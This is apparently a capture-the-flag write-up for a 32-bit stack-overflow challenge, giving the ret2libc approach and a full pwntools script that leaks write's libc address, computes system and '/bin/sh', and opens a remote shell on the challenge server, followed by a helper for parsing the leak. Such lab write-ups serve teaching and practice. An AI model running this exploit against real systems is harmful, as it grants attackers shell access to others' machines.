Load the binary into IDA: there is a stack overflow, but no system and no "/bin/sh" string in the binary, so we have to leak the libc addresses ourselves.
Approach:
On the first overflow, return into write so that write(1, write_got, 4) runs and prints the real address of write (call p.recv() first; the banner must be received once here, otherwise reading write_addr below goes wrong). From that address compute the real addresses of system and "/bin/sh", and make the chain return to vulnerable_function so we reach the overflow point a second time; on the second overflow, overwrite the return address with system to execute system("/bin/sh").
Script:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = remote('111.198.29.45', 39255)
elf = ELF('./level3')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

function = 0x0804844B             # vulnerable_function: return here to reach the overflow a second time
write_plt = elf.plt['write']
write_got = elf.got['write']
write_libc = libc.symbols['write']
system_libc = libc.symbols['system']
binsh = next(libc.search(b'/bin/sh'))

p.recv()                           # drain the banner first, otherwise the 4-byte leak below is misread

# stage 1: overflow, return to write@plt as write(1, write_got, 4), then return to vulnerable_function
payload = b'a' * (0x88 + 0x04)     # buffer plus saved ebp
payload += p32(write_plt) + p32(function)
payload += p32(1) + p32(write_got) + p32(4)
p.sendline(payload)

write_addr = u32(p.recv(4))
offset = write_addr - write_libc   # libc base
system_addr = offset + system_libc
binsh_addr = offset + binsh

# stage 2: overflow again, call system("/bin/sh"); 'function' only serves as the fake return address
payload = b'a' * (0x88 + 0x04)
payload += p32(system_addr) + p32(function) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
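As an added illustration (not the writeup's script, and independent of pwntools), the two pieces of bookkeeping the approach above rests on: turning the four leaked bytes into a libc base with a page-alignment sanity check, which catches exactly the misread leak the p.recv() note warns about, and decoding a stage-one frame back into its named slots so the layout after the 0x88+4 padding is explicit. The libc base and symbol offsets in the sample are constructed values, not the challenge's real ones.

```python
import struct

PADDING = 0x88 + 0x04   # buffer plus saved ebp, as in the writeup
PAGE = 0x1000           # libc is mapped at a page-aligned base

def u32(b):
    """Little-endian 32-bit unpack; refuse anything but exactly 4 bytes."""
    if len(b) != 4:
        raise ValueError("expected exactly 4 leaked bytes, got %d" % len(b))
    return struct.unpack("<I", b)[0]

def resolve_libc(leak, write_off, system_off, binsh_off):
    """Convert the leaked write@got value into (libc_base, system, "/bin/sh").
    If the base is not page aligned the leak was misread, typically because
    leftover banner bytes were consumed instead of the 4 address bytes."""
    write_addr = u32(leak)
    base = write_addr - write_off
    if base % PAGE:
        raise ValueError("libc base 0x%x not page aligned; leak misread" % base)
    return base, base + system_off, base + binsh_off

def decode_stage1(payload):
    """Split a stage-one payload into the slots the stack holds after the
    overflow: return target, fake return address, then write's three args."""
    if len(payload) < PADDING + 5 * 4:
        raise ValueError("payload too short for the frame layout")
    fields = struct.unpack("<5I", payload[PADDING:PADDING + 20])
    names = ("ret_target", "fake_ret", "arg_fd", "arg_buf", "arg_len")
    return dict(zip(names, fields))

# Constructed sample: libc base 0xf7d80000 and invented symbol offsets,
# so the leaked write address is 0xf7e543c0 (bytes c0 43 e5 f7).
SAMPLE_LEAK = bytes.fromhex("c043e5f7")
SAMPLE_OFFS = dict(write_off=0xd43c0, system_off=0x3ada0, binsh_off=0x15ba0b)

if __name__ == "__main__":
    base, system_addr, binsh_addr = resolve_libc(SAMPLE_LEAK, **SAMPLE_OFFS)
    print(hex(base), hex(system_addr), hex(binsh_addr))
```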